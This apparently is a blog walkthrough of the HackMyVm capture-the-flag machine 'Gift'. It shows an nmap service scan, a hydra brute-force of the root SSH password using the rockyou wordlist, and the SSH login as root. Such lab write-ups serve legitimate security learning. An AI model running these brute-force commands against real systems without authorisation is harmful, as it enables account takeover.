Sitemap

HackMyVm : Machine — Gift

Complete walkthrough of HackMyVm machine — Gift.

Jun 22, 2023

--

URL : https://hackmyvm.eu/machines/machine.php?vm=Gift

Let’s start off by running a network scan using nmap.

  • nmap -sV 192.168.0.107
  • -sV : Probe open ports to determine service/version info

We can find 2 ports open

Press enter or click to view image in full size

Now let’s start with the ssh port

To find out the password we have to brute force, for this, we can use hydra.

  • hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.0.107 ssh
  • -l : login name
  • -P : mention the file that contains the possible passwords.

We obtain the password

Press enter or click to view image in full size

Now let’s ssh into the machine

  • ssh root@192.168.0.107
  • ssh [username]@[address]

When prompted enter the password we got from hydra and we are in.

Press enter or click to view image in full size

Give this a 👏 if you found it useful!

--

--

Hritesh J
Hritesh J

Written by Hritesh J

Hritesh J is a student pursuing undergraduate studies in CS. Loves cybersecurity and playing ctfs and writing about them. “learning one new thing every day.”

No responses yet